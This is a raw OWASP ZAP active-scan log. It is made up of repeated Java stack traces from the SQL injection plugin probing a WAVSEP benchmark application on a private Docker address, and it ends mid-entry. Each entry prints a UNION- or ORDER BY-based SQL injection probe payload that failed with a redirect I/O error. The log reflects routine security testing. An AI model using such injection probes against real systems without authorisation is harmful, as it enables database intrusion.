org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681513 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 3453#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' ORDER BY 3453# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681514 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681515 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681515 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681516 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681517 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681517 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681518 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681518 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681519 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681520 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681521 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681521 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 